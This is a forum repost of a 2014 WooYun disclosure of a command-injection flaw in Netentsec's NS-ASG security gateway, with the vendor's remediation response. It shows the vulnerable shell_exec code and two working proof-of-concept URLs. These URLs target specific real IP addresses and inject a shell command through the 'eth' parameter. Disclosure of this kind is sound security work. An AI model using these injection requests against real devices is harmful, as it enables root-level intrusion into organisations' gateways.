中神通公司技术论坛 - Powered by Discuz! Board

标题: 网康 NS-ASG 应用安全网关所有版本getshell [打印本页]

作者: linda 时间: 2014-12-31 10:27 标题: 网康 NS-ASG 应用安全网关所有版本getshell

漏洞概要
缺陷编号：       WooYun-2014-58946
漏洞标题：       网康 NS-ASG 应用安全网关所有版本getshell
相关厂商：       网康科技
漏洞作者：       小新
提交时间：       2014-04-30 14:06
公开时间：       2014-06-14 14:07
漏洞类型：       命令执行
危害等级：       中
自评Rank：       10
漏洞状态：       厂商已经确认
漏洞来源：       http://www.wooyun.org
Tags标签：    代码审计

漏洞详情披露状态：
2014-04-30：       细节已通知厂商并且等待厂商处理中
2014-05-01：       厂商已经确认，细节仅向厂商公开
2014-05-11：       细节向核心白帽子及相关领域专家公开
2014-05-21：       细节向普通白帽子公开
2014-05-31：       细节向实习白帽子公开
2014-06-14：       细节向公众公开

简要描述：网康 NS-ASG 应用安全网关存在命令注入，apache以root运行，听说这货有奖金，我就来了
详细说明：在index文件中。。。。

code 区域58  if($eth)
  59  {
  60    $ipaddr = shell_exec("/sbin/ifconfig $eth | head -2 | awk '{NR==2} END{print $2}'");
  61    $ipaddr = trim(substr($ipaddr, 5));
  62    redirect("https://".$ipaddr."/vpnweb/index.php?para=".$par);
  63  }
  64  else
  65    redirect("/vpnweb/index.php?para=".$par);
  66  ?>

很明显了....

code 区域https://202.113.20.208/index.php?eth=eth0%20;echo%20123%20%3E/Isc/third-party/httpd/htdocs/x.txt;ifconfig
https://221.213.45.231/index.php?eth=eth0%20;echo%20123%20%3E/Isc/third-party/httpd/htdocs/x.txt;ifconfig
漏洞证明：

修复方案：过滤过滤再过滤。
版权声明：转载请注明来源小新@乌云
漏洞回应
厂商回应：
危害等级：中
漏洞Rank：5
确认时间：2014-05-01 22:05
厂商回复：4月29日，网康收到CNVD漏洞细节通知，迅速启动并同时展开了以下工作：
1.进一步验证漏洞细节，目前已确认所曝漏洞确实存在于ASG产品；
2.对全线产品进行安全自查，重点确认ASG产品是否仍存其它未知漏洞，并验证类似漏洞是否同存于其它产品线，截至目前，自查工作仍在进行中，全线产品暂未发现新的漏洞；
3.开发用于漏洞修补的更新程序，将尽快发布应急补丁包，介时用户可通过操作设备管理界面直接安装该更新程序以对所曝漏洞进行应急性修补；
4.售后服务部通过内部CRM系统导出全部ASG用户名单，并开始逐一联系用户通报漏洞情况，补丁包发布后，将再次逐一通知所有用户及时安装更新，此项工作预计3工作日内完成；
5.为避免统计疏漏，工程部于4月30日16:00向CNVD共享了在线ASG设备的辨识方法，将配合CNVD共同开展在线设备的主动探测工作，一旦发现未更新补丁的在线设备，将联系并协助用户及时更新，此项工作预计10工作日内完成；
6.将尽快向社会开放漏洞提交邮箱，接受第三方机构、白帽子及其它组织、个人向网康提交产品漏洞，向所有帮助网康产品进步的组织和人士表示感谢。
最新状态：暂无
原文：http://www.wooyun.org/bugs/wooyun-2014-058946

[ 本帖最后由 linda 于 2016-2-16 11:41 编辑 ]

欢迎光临中神通公司技术论坛 (http://trustcomputing.com.cn/bbs/)